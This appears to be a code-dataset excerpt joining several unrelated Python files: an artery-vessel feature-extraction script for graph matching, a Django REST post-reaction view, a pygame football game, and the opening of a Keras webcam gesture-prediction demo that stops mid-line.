19-26 : absolute position of start and end point to center of vessel segment image_x\n if vessel_obj.node1.x < vessel_obj.node2.x:\n features.append(vessel_obj.node1.x / vessel_center_of_mass[0])\n features.append(vessel_obj.node1.y / vessel_center_of_mass[1])\n features.append(vessel_obj.node1.x / vessel_weighted_center_of_mass[0])\n features.append(vessel_obj.node1.y / vessel_weighted_center_of_mass[1])\n features.append(vessel_obj.node2.x / vessel_center_of_mass[0])\n features.append(vessel_obj.node2.y / vessel_center_of_mass[1])\n features.append(vessel_obj.node2.x / vessel_weighted_center_of_mass[0])\n features.append(vessel_obj.node2.y / vessel_weighted_center_of_mass[1])\n\n feature_dict[\"p1_abs_x_center\"] = vessel_obj.node1.x / vessel_center_of_mass[0]\n feature_dict[\"p1_abs_y_center\"] = vessel_obj.node1.y / vessel_center_of_mass[1]\n feature_dict[\"p1_abs_x_weighted_center\"] = vessel_obj.node1.x / vessel_weighted_center_of_mass[0]\n feature_dict[\"p1_abs_y_weighted_center\"] = vessel_obj.node1.y / vessel_weighted_center_of_mass[1]\n feature_dict[\"p2_abs_x_center\"] = vessel_obj.node2.x / vessel_center_of_mass[0]\n feature_dict[\"p2_abs_y_center\"] = vessel_obj.node2.y / vessel_center_of_mass[1]\n feature_dict[\"p2_abs_x_weighted_center\"] = vessel_obj.node2.x / vessel_weighted_center_of_mass[0]\n feature_dict[\"p2_abs_y_weighted_center\"] = vessel_obj.node2.y / vessel_weighted_center_of_mass[1]\n else:\n features.append(vessel_obj.node2.x / vessel_center_of_mass[0])\n features.append(vessel_obj.node2.y / vessel_center_of_mass[1])\n features.append(vessel_obj.node2.x / vessel_weighted_center_of_mass[0])\n features.append(vessel_obj.node2.y / vessel_weighted_center_of_mass[1])\n features.append(vessel_obj.node1.x / vessel_center_of_mass[0])\n features.append(vessel_obj.node1.y / vessel_center_of_mass[1])\n features.append(vessel_obj.node1.x / vessel_weighted_center_of_mass[0])\n features.append(vessel_obj.node1.y / vessel_weighted_center_of_mass[1])\n\n feature_dict[\"p1_abs_x_center\"] = vessel_obj.node2.x / vessel_center_of_mass[0]\n feature_dict[\"p1_abs_y_center\"] = vessel_obj.node2.y / vessel_center_of_mass[1]\n feature_dict[\"p1_abs_x_weighted_center\"] = vessel_obj.node2.x / vessel_weighted_center_of_mass[0]\n feature_dict[\"p1_abs_y_weighted_center\"] = vessel_obj.node2.y / vessel_weighted_center_of_mass[1]\n feature_dict[\"p2_abs_x_center\"] = vessel_obj.node1.x / vessel_center_of_mass[0]\n feature_dict[\"p2_abs_y_center\"] = vessel_obj.node1.y / vessel_center_of_mass[1]\n feature_dict[\"p2_abs_x_weighted_center\"] = vessel_obj.node1.x / vessel_weighted_center_of_mass[0]\n feature_dict[\"p2_abs_y_weighted_center\"] = vessel_obj.node1.y / vessel_weighted_center_of_mass[1]\n\n # feature 27, 28: degree of two points\n if vessel_obj.node1.x < vessel_obj.node2.x:\n features.append(vessel_obj.node1.degree)\n features.append(vessel_obj.node2.degree)\n feature_dict[\"p1_degree\"] = vessel_obj.node1.degree\n feature_dict[\"p2_degree\"] = vessel_obj.node2.degree\n\n else:\n features.append(vessel_obj.node2.degree)\n features.append(vessel_obj.node1.degree)\n feature_dict[\"p1_degree\"] = vessel_obj.node2.degree\n feature_dict[\"p2_degree\"] = vessel_obj.node1.degree\n\n # feature 29, 30, 31, 32: mean, std, min, max of vascular radius\n radius = vessel_obj.vessel_centerline_dist\n radius = radius[radius > 0]\n features.append(np.mean(radius))\n features.append(np.std(radius))\n features.append(np.min(radius))\n features.append(np.max(radius))\n feature_dict[\"r_mean\"] = np.mean(radius)\n feature_dict[\"r_std\"] = np.std(radius)\n feature_dict[\"r_min\"] = np.min(radius)\n feature_dict[\"r_max\"] = np.max(radius)\n\n features.append(vessel_obj.vessel_class)\n return feature_dict\n\n def extract_radiomics_features(self, vessel_obj, original_image):\n # extract features from predicted numpy arrays\n data_x = sitk.GetImageFromArray(original_image)\n data_y = sitk.GetImageFromArray(vessel_obj.vessel_mask)\n\n # columns_drop = [\"diagnostics_Configuration_EnabledImageTypes\", \"diagnostics_Configuration_Settings\",\n # \"diagnostics_Image-original_Dimensionality\", \"diagnostics_Image-original_Hash\",\n # \"diagnostics_Image-original_Size\", \"diagnostics_Image-original_Spacing\",\n # \"diagnostics_Mask-original_BoundingBox\", \"diagnostics_Mask-original_CenterOfMass\",\n # \"diagnostics_Mask-original_CenterOfMassIndex\", \"diagnostics_Mask-original_Hash\",\n # \"diagnostics_Mask-original_Size\", \"diagnostics_Mask-original_Spacing\",\n # \"diagnostics_Versions_Numpy\", \"diagnostics_Versions_PyRadiomics\",\n # \"diagnostics_Versions_PyWavelet\", \"diagnostics_Versions_Python\",\n # \"diagnostics_Versions_SimpleITK\",\n # \"diagnostics_Image-original_Maximum\",\n # \"diagnostics_Image-original_Mean\",\n # \"diagnostics_Image-original_Minimum\"]\n\n feature = self.extractor.execute(data_x, data_y, label=1)\n keys = []\n feature_dict = {}\n for key, value in sorted(six.iteritems(feature)):\n if not key.startswith(\"diagnostics\"):\n #print('\\t', key, ':', value)\n if type(value) == np.ndarray:\n keys.append(key)\n feature_dict[key] = np.float(value)\n else:\n raise ValueError(\"CANNOT PARSE VALUE\")\n\n #print(\"# number of keys {}\".format(len(keys)))\n # write csv header\n return feature_dict\n\n def get_class(self, vessel_obj):\n return vessel_obj.vessel_class\n\n\ndef _get_sample_list():\n dataset0 = []\n dataset1 = []\n with open(\"selected_subjects.txt\", \"r\") as f:\n #with open(\"/media/z/data2/artery_semantic_segmentation/gmn_4_semantic_seg/selected_subjects.txt\", \"r\") as f:\n for row in f.readlines():\n if row[0].isdigit():\n dataset1.append(row.strip())\n elif row[0].isalpha() and (row.strip() not in [\"NJ\", \"TW\"]):\n dataset0.append(row.strip())\n\n return {\"NJ\": dataset1, \"TW\": dataset0}\n\n\ndef get_feature_names():\n from core.utils.module import VesselSegment, Node\n vessel_obj = VesselSegment(Node(1, 100, 100), Node(3, 120, 120), np.random.rand(128,128))\n vessel_obj.vessel_class = 1\n\n vessel_mask = np.random.rand(128,128)\n mean = np.mean(vessel_mask)\n vessel_mask[vessel_mask>mean] = 1\n vessel_mask[vessel_mask!=1] = 0\n #print(vessel_mask)\n vessel_mask = np.array(vessel_mask, dtype=np.int8)\n vessel_obj.vessel_mask = vessel_mask\n vessel_obj.vessel_centerline_dist = np.random.rand(128,128)\n\n binary_image = vessel_mask\n\n feature_dict = {}\n fa = FeatureExtractor()\n pos_features = fa.extract_pos_feature(vessel_obj, binary_image, np.random.rand(128,128))\n image_features = fa.extract_radiomics_features(vessel_obj, np.random.rand(128,128))\n \n feature_dict.update(image_features)\n feature_dict.update(pos_features)\n sorted_keys = sorted(feature_dict)\n\n return sorted_keys\n\n\ndef __switch__(g0, g1):\n n0, n1 = g0.number_of_nodes(), g1.number_of_nodes()\n\n if n0 >= n1:\n return g1, g0\n else:\n return g0, g1\n\ndef __build_graphs__(g):\n A = nx.adjacency_matrix(g).todense()\n edge_num = g.number_of_edges()*2 # in network graph, adjmatrix indicates undirected graph, thus, for directed graph, the number of edges are doubled\n node_num = g.number_of_nodes()\n G = np.zeros((node_num, edge_num), dtype=np.float32)\n H = np.zeros((node_num, edge_num), dtype=np.float32)\n edge_idx = 0\n for i in range(node_num): # iterative graph adjacency matrix\n for j in range(node_num):\n if A[i, j] == 1:\n G[i, edge_idx] = 1\n H[j, edge_idx] = 1\n edge_idx += 1\n return A, G, H, edge_num\n\n\ndef __build_2gm_pair(g0, g1, category, sample_idx):\n n0, n1 = g0.number_of_nodes(), g1.number_of_nodes()\n perm_mat = np.zeros((n0, n1))\n for i in range(n0):\n for j in range(n1):\n if g0.nodes()[i]['data'].vessel_class == g1.nodes()[j]['data'].vessel_class:\n perm_mat[i, j] = 1.0\n\n A0, G0, H0, e0 = __build_graphs__(g0)\n A1, G1, H1, e1 = __build_graphs__(g1)\n\n ret_dict = {'ns': [torch.tensor(x) for x in [n0, n1]],\n 'es': [torch.tensor(x) for x in [e0, e1]],\n 'gs': [g0, g1],\n 'gt_perm_mat': perm_mat,\n 'Gs': [torch.Tensor(x) for x in [G0, G1]],\n 'Hs': [torch.Tensor(x) for x in [H0, H1]],\n 'As': [torch.Tensor(x) for x in [A0, A1]],\n 'cls': category,\n 'id_list': [sample_idx[0], sample_idx[1]]}\n\n feat0 = np.stack([np.array(g0.nodes()[i]['data'].features) for i in range(n0)], axis=-1).T\n feat1 = np.stack([np.array(g1.nodes()[i]['data'].features) for i in range(n1)], axis=-1).T\n ret_dict['pos_features'] = [torch.Tensor(x) for x in [feat0, feat1]]\n\n return ret_dict\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--base_path', type=str, default='/media/z/data21/artery_semantic_segmentation')\n parser.add_argument('--data_path', type=str, default=\"gmn_vessel\")\n parser.add_argument('--save_path', type=str, default=\"artery/data2\")\n parser.add_argument('--project_path', type=str, default=\"ThinkMatch\")\n parser.add_argument('--image_size', type=int, default=512)\n args = parser.parse_args()\n\n if not os.path.isdir(args.save_path):\n os.makedirs(args.save_path)\n\n sample_list = _get_sample_list()\n\n FEATURE_DICT_ALL = {}\n fa = FeatureExtractor()\n\n extract = False\n if extract:\n for dataset_name, data_path in zip([\"TW\", \"NJ\"],\n [os.path.join(args.base_path, \"gmn_vessel/data/data_tw_semantic/processed\"),\n os.path.join(args.base_path, \"gmn_vessel/data/data_nj_semantic/processed\")]):\n selected_sample_names = sample_list[dataset_name]\n for selected_sample_name in tqdm(selected_sample_names):\n print(f\"[x] processing {selected_sample_name} ---- \")\n pkl_file_path = os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}_g_switch_unique.pkl\")\n\n binary_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}_binary_image.png\"), cv2.IMREAD_GRAYSCALE)\n if binary_image.shape[0] != args.image_size:\n binary_image = cv2.resize(binary_image, (args.image_size, args.image_size))\n\n original_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}.png\"), cv2.IMREAD_GRAYSCALE)\n if original_image.shape[0] != args.image_size:\n original_image = cv2.resize(original_image, (args.image_size, args.image_size))\n print(pkl_file_path)\n g = pickle.load(open(pkl_file_path, 'rb'))\n for n in range(len(g.nodes)):\n vessel_segment = g.nodes()[n]['data']\n feature_dict = {}\n pos_features = fa.extract_pos_feature(vessel_segment, binary_image, original_image)\n image_features = fa.extract_radiomics_features(vessel_segment, original_image)\n feature_dict.update(pos_features)\n feature_dict.update(image_features)\n sorted_keys = sorted(feature_dict)\n features = []\n for k in sorted_keys:\n if k in FEATURE_DICT_ALL.keys():\n FEATURE_DICT_ALL[k].append(feature_dict[k])\n else:\n FEATURE_DICT_ALL[k] = []\n FEATURE_DICT_ALL[k].append(feature_dict[k])\n\n features.append(feature_dict[k])\n\n vessel_segment.features = features\n # new\n # vessel_segment.vessel_centerline = None\n vessel_segment.vessel_mask = None\n vessel_segment.vessel_centerline_dist = None\n\n pickle.dump(g, open(os.path.join(args.base_path, args.project_path, args.save_path, f\"{selected_sample_name}.pkl\"), \"wb\"))\n cv2.imwrite(os.path.join(args.base_path, args.project_path, args.save_path,\n f\"{selected_sample_name}_binary_image.png\"), binary_image)\n cv2.imwrite(os.path.join(args.base_path, args.project_path, args.save_path,\n f\"{selected_sample_name}.png\"), original_image)\n\n semantic_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name,\n f\"{selected_sample_name}_step12_g_switch_unique_semantic_image.png\"))\n cv2.imwrite(os.path.join(args.base_path, args.project_path, args.save_path,\n f\"{selected_sample_name}_semantic.png\"), semantic_image)\n\n # normalize features\n sorted_keys = sorted(FEATURE_DICT_ALL)\n for k in sorted_keys:\n print(f\"k = {k}, min = {np.min(FEATURE_DICT_ALL[k])}, max = {np.max(FEATURE_DICT_ALL[k])}, len = {len(FEATURE_DICT_ALL[k])}\")\n\n for dataset_name, data_path in zip([\"TW\", \"NJ\"],\n [os.path.join(args.base_path, \"gmn_vessel/data/data_tw_semantic/processed\"),\n os.path.join(args.base_path, \"gmn_vessel/data/data_nj_semantic/processed\")]):\n selected_sample_names = sample_list[dataset_name]\n for selected_sample_name in tqdm(selected_sample_names):\n print(f\"[x] processing {selected_sample_name} ---- \")\n pkl_file_path = os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}_g_switch_unique.pkl\")\n\n binary_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}_binary_image.png\"), cv2.IMREAD_GRAYSCALE)\n if binary_image.shape[0] != args.image_size:\n binary_image = cv2.resize(binary_image, (args.image_size, args.image_size))\n\n original_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}.png\"), cv2.IMREAD_GRAYSCALE)\n if original_image.shape[0] != args.image_size:\n original_image = cv2.resize(original_image, (args.image_size, args.image_size))\n\n print(pkl_file_path)\n g = pickle.load(open(pkl_file_path, 'rb'))\n for n in range(len(g.nodes)):\n vessel_segment = g.nodes()[n]['data']\n feature_dict = {}\n pos_features = fa.extract_pos_feature(vessel_segment, binary_image, original_image)\n image_features = fa.extract_radiomics_features(vessel_segment, original_image)\n feature_dict.update(pos_features)\n feature_dict.update(image_features)\n sorted_keys = sorted(feature_dict)\n features = []\n for k in sorted_keys:\n fea = (feature_dict[k] - np.min(FEATURE_DICT_ALL[k])) / (np.max(FEATURE_DICT_ALL[k]) - np.min(FEATURE_DICT_ALL[k]))\n features.append(fea)\n\n vessel_segment.features = features\n # new\n # vessel_segment.vessel_centerline = None\n vessel_segment.vessel_centerline = np.asarray(vessel_segment.vessel_centerline, np.uint8)\n vessel_segment.vessel_mask = None\n vessel_segment.vessel_centerline_dist = None\n\n\n pickle.dump(g, open(os.path.join(args.base_path, args.project_path, args.save_path, f\"{selected_sample_name}.pkl\"), \"wb\"))\n \n\n # generate training samples for 2GM\n if not os.path.isdir(os.path.join(args.base_path, args.project_path, \"ngm_data\")):\n os.makedirs(os.path.join(args.base_path, args.project_path, \"ngm_data\"))\n\n # graph_names = glob(os.path.join(args.base_path, args.project_path, args.save_path, \"*.pkl\"))\n # for i in tqdm(range(len(graph_names))):\n # for j in range(len(graph_names)):\n # if i!=j:\n # data_file_path_0 = graph_names[i][:graph_names[i].rfind(\"/\")]\n # sample_id_0 = graph_names[i][graph_names[i].rfind(\"/\")+1:graph_names[i].rfind(\".pkl\")]\n # category_0 = ARTERY_CATEGORY[0] if sample_id_0.rfind(ARTERY_CATEGORY[0]) != -1 else ARTERY_CATEGORY[1]\n\n # data_file_path_1 = graph_names[j][:graph_names[j].rfind(\"/\")]\n # sample_id_1 = graph_names[j][graph_names[j].rfind(\"/\")+1:graph_names[j].rfind(\".pkl\")]\n # category_1 = ARTERY_CATEGORY[0] if sample_id_1.rfind(ARTERY_CATEGORY[0]) != -1 else ARTERY_CATEGORY[1]\n # if category_0 == category_1:\n # image, bin, g0 = _load_graph(data_file_path_0, sample_id_0)\n # image, bin, g1 = _load_graph(data_file_path_1, sample_id_1)\n\n # g0, g1 = __switch__(g0, g1)\n # # build graph\n # gm_data = __build_2gm_pair(g0, g1, category_0, [sample_id_0, sample_id_1])\n # gm_data = collate_fn([gm_data])\n # pickle.dump(gm_data, \n # open(os.path.join(args.base_path, args.project_path, \"ngm_data\", f\"{sample_id_0}_{sample_id_1}.pkl\"), \"wb\"))\n\n","repo_name":"chenzhao2023/ICA_Semantic_Baseline","sub_path":"ThinkMatch/prepare_data_featvec.py","file_name":"prepare_data_featvec.py","file_ext":"py","file_size_in_byte":24701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24883982284","text":"from django.forms import ValidationError\nfrom rest_framework import serializers\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\nfrom delilahdawgapi.models import Post, Reaction, PostReaction\n\nclass PostReactionView(ViewSet):\n\n def create(self, request):\n \n user = request.auth.user.rare_user\n # user = RareUser.objects.get(pk=request.data[\"rareuserId\"])\n post = Post.objects.get(pk=request.data[\"postId\"])\n reaction = Reaction.objects.get(pk=request.data[\"reactionId\"])\n \n postreaction = PostReaction()\n postreaction.user = user\n postreaction.post = post\n postreaction.reaction = reaction\n \n try:\n postreaction.save()\n serializer = PostReactionSerializer(postreaction, context={'request': request})\n return Response(serializer.data)\n \n except ValidationError as ex:\n return Response({\"reason\": ex.message}, status=status.HTTP_400_BAD_REQUEST)\n \n def destroy(self, request, pk=None):\n try:\n postreaction = PostReaction.objects.get(pk=pk)\n postreaction.delete()\n \n return Response({}, status=status.HTTP_204_NO_CONTENT)\n \n except PostReaction.DoesNotExist as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)\n \n except Exception as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \nclass PostReactionSerializer(serializers.ModelSerializer):\n class Meta:\n model = PostReaction\n field = ('id', 'user', 'post', 'reaction')","repo_name":"nss-evening-cohort-15/rare-api-v2-cool-name","sub_path":"delilahdawgapi/views/post_reaction.py","file_name":"post_reaction.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"15550301085","text":"import pygame, sys, os\r\nfrom pygame.math import Vector2\r\nFPS = 60\r\npygame.init()\r\nscreen_width = 1250\r\nscreen_height = 650\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\ngame_icon = pygame.image.load(os.path.join ('support', 'gameicon.png')).convert_alpha()\r\npygame.display.set_icon(game_icon)\r\npygame.display.set_caption(\"Football\")\r\nclock = pygame.time.Clock()\r\nfullscreen = False\r\n#game font\r\ngame_font = pygame.font.Font(os.path.join ('support','freesansbold.ttf'), 32)\r\n\r\n#sounds\r\nball_hit = pygame.mixer.Sound(os.path.join ('support', \"ball_hit.wav\"))\r\nscore_m = pygame.mixer.Sound(os.path.join ('support',\"score.wav\"))\r\nboo = pygame.mixer.Sound(os.path.join ('support',\"boo.wav\"))\r\nplayer_hit = pygame.mixer.Sound(os.path.join ('support',\"ball_hitr.wav\"))\r\n\r\n#background\r\nbackground = pygame.image.load(os.path.join ('support', 'BG_IMG.png')).convert()\r\nplayer1_goal = pygame.Rect(5, screen_height/2-82, 10, 170)\r\nplayer2_goal = pygame.Rect(screen_width-15, screen_height/2-82, 10, 170)\r\n\r\n#player1\r\nplayer1 = pygame.image.load(os.path.join ('support','player1.png')).convert_alpha()\r\nplayer1_player = player1\r\nplayer1_angle = 0\r\nplayer1_velocity = Vector2(-3,0)\r\nplayer1_position = Vector2(screen_width/2+300, screen_height/2-50)\r\nplayer1_rect = player1.get_rect(center = player1_position)\r\nplayer1_mask = pygame.mask.from_surface(player1)\r\nplayer1_score = 0\r\nplay1_stext = game_font.render(\"player1 \", False, (200, 200, 200))\r\n\r\n#player2\r\nplayer2 = pygame.image.load(os.path.join ('support','player2.png')).convert_alpha()\r\nplayer2_player = player2\r\nplayer2_angle = 0\r\nplayer2_velocity = Vector2(3,0)\r\nplayer2_position = Vector2(screen_width/2-300, screen_height/2+50)\r\nplayer2_rect = player2.get_rect(center = player2_position)\r\nplayer2_mask = pygame.mask.from_surface(player2)\r\nplayer2_score = 0\r\nplay2_stext = game_font.render(\"player2 \", False, (200, 200, 200))\r\n\r\n#ball\r\nball = pygame.Surface((30, 30), pygame.SRCALPHA)\r\npygame.draw.circle(ball, [255, 255, 255], [15, 15], 15)\r\nball_vel = Vector2(0, 0)\r\nball_pos = Vector2(screen_width/2, screen_height/2)\r\nball_rect = ball.get_rect(center = ball_pos)\r\nball_mask = pygame.mask.from_surface(ball)\r\n \r\nrun = False\r\npause = False\r\nmain = True\r\nwhile main == True: \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if event.type == pygame.VIDEORESIZE:\r\n if not fullscreen:\r\n screen = pygame.display.set_mode((event.w, event.h), pygame.RESIZABLE)\r\n\r\n if event.type == pygame.KEYDOWN:\r\n main = False\r\n run = True\r\n if event.key == pygame.K_f:\r\n fullscreen = not fullscreen\r\n if fullscreen:\r\n screen = pygame.display.set_mode(monitor_size, pygame.FULLSCREEN)\r\n else:\r\n screen = pygame.display.set_mode((screen.get_width(), screen.get_height()), pygame.RESIZABLE)\r\n mainscreen = pygame.image.load(os.path.join ('support','main_screen.png')).convert()\r\n screen.blit(mainscreen,(0,0))\r\n pygame.display.flip()\r\n clock.tick(10)\r\n \r\nwhile run == True:\r\n pygame.mixer.unpause()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n run=False\r\n \r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_DOWN]:\r\n player1_angle +=5\r\n player1_velocity.rotate_ip(-5)\r\n player1_player = pygame.transform.rotate(player1, player1_angle)\r\n player1_rect = player1_player.get_rect(center = player1_rect.center)\r\n player1_mask = pygame.mask.from_surface(player1_player)\r\n \r\n elif keys[pygame.K_UP]:\r\n player1_angle -=5\r\n player1_velocity.rotate_ip(5)\r\n player1_player = pygame.transform.rotate(player1, player1_angle)\r\n player1_rect = player1_player.get_rect(center = player1_rect.center)\r\n player1_mask = pygame.mask.from_surface(player1_player)\r\n\r\n if keys[pygame.K_LEFT]:\r\n player1_angle +=5\r\n player1_velocity.rotate_ip(-5)\r\n player1_player = pygame.transform.rotate(player1, player1_angle)\r\n player1_rect = player1_player.get_rect(center = player1_rect.center)\r\n player1_mask = pygame.mask.from_surface(player1_player)\r\n \r\n elif keys[pygame.K_RIGHT]:\r\n player1_angle -=5\r\n player1_velocity.rotate_ip(5)\r\n player1_player = pygame.transform.rotate(player1, player1_angle)\r\n player1_rect = player1_player.get_rect(center = player1_rect.center)\r\n player1_mask = pygame.mask.from_surface(player1_player)\r\n\r\n if keys[pygame.K_w]:\r\n player2_angle +=5\r\n player2_velocity.rotate_ip(-5)\r\n player2_player = pygame.transform.rotate(player2, player2_angle)\r\n player2_rect = player2_player.get_rect(center = player2_rect.center)\r\n player2_mask = pygame.mask.from_surface(player2_player)\r\n \r\n elif keys[pygame.K_s]:\r\n player2_angle -=5\r\n player2_velocity.rotate_ip(5)\r\n player2_player = pygame.transform.rotate(player2, player2_angle)\r\n player2_rect = player2_player.get_rect(center = player2_rect.center)\r\n player2_mask = pygame.mask.from_surface(player2_player)\r\n\r\n if keys[pygame.K_a]:\r\n player2_angle +=5\r\n player2_velocity.rotate_ip(-5)\r\n player2_player = pygame.transform.rotate(player2, player2_angle)\r\n player2_rect = player2_player.get_rect(center = player2_rect.center)\r\n player2_mask = pygame.mask.from_surface(player2_player)\r\n \r\n elif keys[pygame.K_d]:\r\n player2_angle -=5\r\n player2_velocity.rotate_ip(5)\r\n player2_player = pygame.transform.rotate(player2, player2_angle)\r\n player2_rect = player2_player.get_rect(center = player2_rect.center)\r\n player2_mask = pygame.mask.from_surface(player2_player)\r\n\r\n if keys[pygame.K_SPACE]:\r\n pause = True\r\n pygame.mixer.pause()\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:\r\n ball_vel = Vector2(0, 0)\r\n ball_pos = Vector2(screen_width/2, screen_height/2)\r\n pygame.mixer.Sound.play(boo)\r\n current_time = pygame.time.get_ticks()\r\n player1_position += player1_velocity\r\n player1_rect.center = player1_position\r\n player2_position += player2_velocity\r\n player2_rect.center = player2_position\r\n ball_vel *= 0.99\r\n ball_pos += ball_vel\r\n ball_rect.center = ball_pos\r\n\r\n player1_offset = player1_rect[0] -ball_rect[0], player1_rect[1] -ball_rect[1]\r\n player1_overlap = ball_mask.overlap(player1_mask, player1_offset)\r\n\r\n player2_offset = player2_rect[0] -ball_rect[0], player2_rect[1] -ball_rect[1]\r\n player2_overlap = ball_mask.overlap(player2_mask, player2_offset)\r\n\r\n if player1_overlap:\r\n ball_vel = Vector2(player1_velocity) *1.4\r\n pygame.mixer.Sound.play(ball_hit)\r\n \r\n if player2_overlap:\r\n ball_vel = Vector2(player2_velocity) *1.4\r\n pygame.mixer.Sound.play(ball_hit)\r\n \r\n if player1_overlap and player2_overlap:\r\n player1_overlap = None\r\n player2_overlap = None\r\n ball_vel *= 0\r\n \r\n if ball_pos[0]>= screen_width-25 or ball_pos[0]<= 25 or ball_pos[1]>= screen_height-30 or ball_pos[1]<= 30:\r\n pygame.mixer.Sound.play(ball_hit)\r\n\r\n if ball_pos[0]>= screen_width-25:\r\n ball_pos[0] = screen_width-26\r\n ball_vel *= -0.99 \r\n if ball_pos[0]<= 25:\r\n ball_pos[0] = 26\r\n ball_vel *= -0.99\r\n if ball_pos[1]>= screen_height-30:\r\n ball_pos[1] = screen_height-31\r\n ball_vel *= -0.99\r\n if ball_pos[1]<= 30:\r\n ball_pos[1] = 31\r\n ball_vel *= -0.99\r\n \r\n if player1_position[0]>= screen_width-25 or player1_position[0]<= 25 or player1_position[1]>= screen_height-25 or player1_position[1]<= 25:\r\n player1_velocity = -player1_velocity\r\n pygame.mixer.Sound.play(player_hit)\r\n #or player1_velocity = pygame.math.Vector2.reflect(player1_velocity, player1_velocity)\r\n \r\n if player2_position[0]>= screen_width-25 or player2_position[0]<= 25 or player2_position[1]>= screen_height-25 or player2_position[1]<= 25:\r\n player2_velocity = -player2_velocity\r\n pygame.mixer.Sound.play(player_hit)\r\n\r\n if ball_rect.colliderect(player1_goal):\r\n player1_score += 1\r\n ball_vel = Vector2(0, 0)\r\n ball_pos = Vector2(screen_width/2, screen_height/2)\r\n play1_stext = game_font.render(f\"player1 {player1_score}\", False, (200, 200, 200))\r\n pygame.mixer.Sound.play(score_m)\r\n \r\n if ball_rect.colliderect(player2_goal):\r\n player2_score += 1\r\n ball_vel = Vector2(0, 0)\r\n ball_pos = Vector2(screen_width/2, screen_height/2)\r\n play2_stext = game_font.render(f\"player2 {player2_score}\", False, (200, 200, 200))\r\n pygame.mixer.Sound.play(score_m)\r\n \r\n while pause == True:\r\n for event in pygame.event.get():\r\n pause_text = game_font.render(f\"press a key to continue\", False, (255, 255, 255))\r\n screen.blit(pause_text,(screen_width/2-180, screen_height/2))\r\n pygame.display.flip()\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n pause = False\r\n \r\n screen.blit(background,(0,0))\r\n #pygame.draw.rect(screen, (200, 200, 200), player1_goal)\r\n #pygame.draw.rect(screen, (200, 200, 200), player2_goal)\r\n screen.blit(play2_stext,(100,15))\r\n screen.blit(play1_stext,(995,15))\r\n screen.blit(ball, ball_rect)\r\n screen.blit(player1_player, player1_rect)\r\n screen.blit(player2_player, player2_rect)\r\n pygame.display.flip()\r\n clock.tick(FPS)\r\n","repo_name":"Ponsajjan/2Dfootball","sub_path":"footballpy.py","file_name":"footballpy.py","file_ext":"py","file_size_in_byte":9956,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18113203960","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nfrom keras.models import load_model\nimport csv\n\nimport configuration\n\n__author__ = \"ujihirokazuya\"\n__date__ = \"2017/10/28\"\n\n\nclass Demo(object):\n\n # _seq_size = 40\n _seq_size = 150\n # _count_size = 3\n _count_size = 1\n _image_shape = (80, 80)\n\n def __init__(self):\n self.category_dict = dict()\n with open(\"data/data_list/class_id.txt\", \"r\") as f:\n reader = csv.reader(f, delimiter=\" \")\n for row in reader:\n self.category_dict[int(row[0])] = row[1]\n model = load_model(configuration.model_file_name)\n self.model = model\n cap = cv2.VideoCapture(0)\n cap.set(cv2.CAP_PROP_FPS, 30)\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, 80)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 80)\n fps = cap.get(cv2.CAP_PROP_FPS)\n size = cap.get(cv2.CAP_PROP_FRAME_WIDTH), cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n print(\"fps:{}\".format(fps))\n print(\"video size:{}\".format(size))\n self.video_capture = cap\n\n def __enter__(self):\n pass\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.video_capture.release()\n cv2.destroyAllWindows()\n\n def _predict(self, frames):\n frames = np.array(frames)\n frames = frames[:, :, :, np.newaxis]\n frames = (frames / 255.).astype(np.float32)\n x_test = frames[np.newaxis, :, :, :, :]\n result = self.model.predict_classes(x_test, batch_size=1)\n print(result)\n print(self.category_dict.get(result[0]))\n # result2 = self.model.predict(x_test, batch_size=1)\n # print(result2)\n\n def execute(self):\n frames = list()\n count = 0\n print(\"fps:{}\".format(self.video_capture.get(cv2.CAP_PROP_FPS)))\n print(\"w:{}\".format(self.video_capture.get(cv2.CAP_PROP_FRAME_WIDTH)))\n print(\"h:{}\".format(self.video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n is_valid = False\n while True:\n _, frame = self.video_capture.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n if cv2.waitKey(1) & 0xFF == ord('e'):\n is_valid = not is_valid\n if is_valid:\n if self._can_add_frame(count):\n self._add_frames(frames, gray)\n count += 1\n if self._can_predict(frames):\n self._predict(frames)\n frames.clear()\n is_valid = False\n count = 0\n print(count)\n if is_valid:\n text = \"valid\"\n else:\n text = \"invalid\"\n font = cv2.FONT_HERSHEY_PLAIN\n cv2.putText(gray, text, (10, 30), font, 2, (0, 0, 0))\n cv2.imshow('frame', gray)\n\n def _add_frames(self, frames: list, gray):\n frame = cv2.resize(gray, 